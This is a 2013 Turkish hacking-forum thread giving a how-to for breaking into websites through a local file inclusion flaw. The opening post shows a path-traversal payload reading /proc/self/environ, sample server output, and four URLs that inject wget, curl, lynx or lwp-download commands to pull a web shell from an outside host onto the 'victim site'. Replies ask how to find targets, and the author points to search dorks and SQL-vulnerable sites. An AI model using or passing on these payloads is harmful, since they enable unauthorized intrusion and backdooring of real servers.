Lfi Açığından Servere Girme Shell Upload etme //Morris

MorrisFlex · 20 May 2013

Öncelikle Selamun aleyküm // Morris

Kurban sitemizdeki lfi açığı şu şekilde olsun: http://www.BlaBla.com//index.php?action=2

2yi siliyoruz.

../../../../../../../../../../../../../../../proc/self/environ%00

Eşittirden sonra yukarıdaki lfi komutumuzu uyguluyoruz.

Şu şekilde olucaktır ;

http://www.BlaBla.com//index.php?ac...../../../../../../../../../proc/self/environ

Bu adresi browser'a uyguladıktan sonra karşınıza şöyle bir veri çıkıcaktır..

Kod:

[COLOR="Red"][B]Warning: system() [function.system]: Cannot execute a blank command in /proc/20085/environ on line 1
PATH=/bin:/usr/bin?QUERY_STRING=action=../../../../../../../../../../../../../../../proc/self/environ%00?REDIRECT_STATUS=200?REMOTE_ADDR=222.124.156.231?REMOTE_PORT=3420?REQUEST_METHOD=GET?REQUEST_URI=//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00?SCRIPT_FILENAME=/home/blabla/public_html/zzz/index.php?SCRIPT_NAME=/index.php?SERVER_ADDR=174.132.115.6?SERVER_ADMIN=webmaster@blabla.com?SERVER_NAME=blabla.com?SERVER_PORT=80?SERVER_PROTOCOL=HTTP/1.1?SERVER_SIGNATURE=
Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at blabla.com Port 80
SERVER_SOFTWARE=Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635?UNIQUE_ID=S@eCPK6EcwIAAAiIu9gAAAOD?[/B][/COLOR]

Bu yazıyı gördüyseniz , shell sokabilirsiniz demektir..

Şu şekilde shell upload edebilirsiniz ;

Kod:

http://www.blabla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=wget http://shelinizinadresi.com/tools/bd/fxshell.txt -O scroll.php

Kod:

http://www.blabla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=curl http://shelinizinadresi.com/tools/bd/fxshell.txt -o scroll.php

Kod:

http://www.blabla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=lynx http://shelinizinadresi.com/tools/bd/fxshell.txt -o scroll.php

Kod:

http://www.blabla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ%00&cmd=lwp-download http://shelinizinadresi.com/tools/bd/fxshell.txt -o scroll.php

Dipnot :

Shell upload olucaktır , shellinizinadresi.com/tools/bd/fxshell.txt kısmını editleyebilirsiniz.
örnek sizin söyle olabilir http://www.morrisflex.com.nu/morshell.txt

gibi...

crazy2354 · 20 May 2013

lfi acigini nasil bulucam ?

MorrisFlex · 21 May 2013

Lfi dorkları var ayrıca herhangibi bir sql açıklı sitede örnek index.php?id=2

2 kısmını siliyoruz ve LFI Komutumuzu uyguluyoruz.

kalix · 17 Haz 2016

usta kusura bakmada 50 tane forum gezdim birtane adam gibi anlatanı görmedim şu konuyu yaw kardeşim siteye shelli soktuktan sonrasına eyvallah nasl sokacaz servere nasıl ulaşacaz her sitenin sunucusu varmı yokmu bi adam gibi anatın şu konuyu

axmetmcl · 18 Haz 2016

eline sağlık, şimdi bir yerler buldum denemeye çalışıyorum o yüzden bir kaç sorum olacak.

Örneğin: shell'imiz bulunduğu link böyle değil, http://shelinizinadresi.com/tools/bd/fxshell.txt
şöyle: www.adres.com/fxshell.txt

böyle olunca, kurban sitede shell'imiz adresi de www.kurbaninsitesi.com/fxshell.txt mi olmalı?

Lfi Açığından Servere Girme Shell Upload etme //Morris

MorrisFlex

Yeni üye

crazy2354

Üye

MorrisFlex

Yeni üye

kalix

Yeni üye

axmetmcl

Katılımcı Üye

Sosyal medya sayfalarımız